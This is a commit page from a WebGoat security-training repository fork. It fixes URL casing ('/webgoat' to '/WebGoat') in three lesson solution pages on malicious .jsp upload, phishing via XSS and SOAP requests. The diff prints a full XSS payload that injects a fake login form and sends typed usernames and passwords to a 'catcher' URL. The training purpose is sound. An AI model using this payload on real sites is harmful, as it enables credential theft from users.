dubey/WebGoat
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Fixed more /webgoat versus /WebGoat issues.

Browse Source 
git-svn-id: http://webgoat.googlecode.com/svn/trunk/webgoat@467 4033779f-a91e-0410-96ef-6bf7bf53c507
This commit is contained in:
mayhew64@gmail.com 2012-04-26 16:11:18 +00:00
parent f9bf8c6a27
commit 5add3e7c06
3 changed files with 6 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
src/main/webapp/lesson_solutions/MaliciousFileExecution.html
View File

@ -36,8 +36,8 @@ Next, we need to figure out where the files are being uploaded so we can execute
<font size="2"><b>Viewing properties of the uploaded image in Firefox.</b></font><br/><br/><br/><br/>
<img src="lesson_solutions/MaliciousFileExecution_files/image002.jpg"><br/>
<font size="2"><b>File path for the uploaded image (and our .jsp) in Firefox.</b></font><br/><br/>
The URL should look something like <b>http://localhost/webgoat/uploads/image.jpg</b>.<br/>
The last step is to upload our malicious .jsp and browse to it so it will execute. Upload the file, then type its address into your browser. The address should be something like <b>http://localhost/webgoat/uploads/yourfile.jsp</b>.<br/><br/>
The URL should look something like <b>http://localhost/WebGoat/uploads/image.jpg</b>.<br/>
The last step is to upload our malicious .jsp and browse to it so it will execute. Upload the file, then type its address into your browser. The address should be something like <b>http://localhost/WebGoat/uploads/yourfile.jsp</b>.<br/><br/>
A blank page will load. You can then return to the lesson and refresh, completing the lesson.<br/><br/><br/>

6
src/main/webapp/lesson_solutions/Phishing.html
View File

@ -18,7 +18,7 @@ hard for a victim to determinate that the content is malicious.
<p><b>General Goal(s):</b><br/>
The user should be able to add a form asking for username
and password. On submit the input should be sent to
http://localhost/webgoat/catcher?PROPERTY=yes&user=catchedUserName&password=catchedPasswordName
http://localhost/WebGoat/catcher?PROPERTY=yes&user=catchedUserName&password=catchedPasswordName
</p>
<b>Solution:</b><br/>
@ -38,7 +38,7 @@ name = &quot;pass&quot;&gt;&lt;br&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;
</p>
Now you need a script:
<p>
&lt;script&gt;function hack(){ XSSImage=new Image; XSSImage.src=&quot;<font color="blue">http://localhost/webgoat/</font>catcher?PROPERTY=yes&amp;user=&quot;+
&lt;script&gt;function hack(){ XSSImage=new Image; XSSImage.src=&quot;<font color="blue">http://localhost/WebGoat/</font>catcher?PROPERTY=yes&amp;user=&quot;+
document.phish.user.value + &quot;&amp;password=&quot; + document.phish.pass.value + &quot;&quot;; alert(&quot;Had this been a real attack... Your credentials were just stolen.
User Name = &quot; + document.phish.user.value + &quot;Password = &quot; + document.phish.pass.value);}
&lt;/script&gt;
@ -53,7 +53,7 @@ calls the script. You can reach this with the onclick="myFunction()" handler:
&lt;input type=&quot;submit&quot; name=&quot;login&quot; value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;
<p>
The final String looks like this:<br/>
&lt;/form&gt;&lt;script&gt;function hack(){ XSSImage=new Image; XSSImage.src=&quot;<font color="blue">http://localhost/webgoat/</font>catcher?PROPERTY=yes&amp;user=&quot;+
&lt;/form&gt;&lt;script&gt;function hack(){ XSSImage=new Image; XSSImage.src=&quot;<font color="blue">http://localhost/WebGoat/</font>catcher?PROPERTY=yes&amp;user=&quot;+
document.phish.user.value + &quot;&amp;password=&quot; + document.phish.pass.value + &quot;&quot;; alert(&quot;Had this been a real attack... Your credentials were just stolen.
User Name = &quot; + document.phish.user.value + &quot;Password = &quot; + document.phish.pass.value);}
&lt;/script&gt;&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H3

2
src/main/webapp/lesson_solutions/SoapRequest.html
View File

@ -777,7 +777,7 @@ HTTP Request with WebScarab and click on the
<li class=MsoNormal style='mso-list:l0 level1 lfo3;tab-stops:list 36.0pt'><span
style='font-family:"Arial","sans-serif"'>Change the POST header to open
the SoapRequest: <br/>
POST http://localhost/webgoat/services/SoapRequest HTTP/1.1 <b>(This will vary based on which ports you are using)</b><o:p></o:p></span></li>
POST http://localhost/WebGoat/services/SoapRequest HTTP/1.1 <b>(This will vary based on which ports you are using)</b><o:p></o:p></span></li>
<li class=MsoNormal style='mso-list:l0 level1 lfo3;tab-stops:list 36.0pt'><span
style='font-family:"Arial","sans-serif"'>Change the Content-Type to
text/xml:<br/>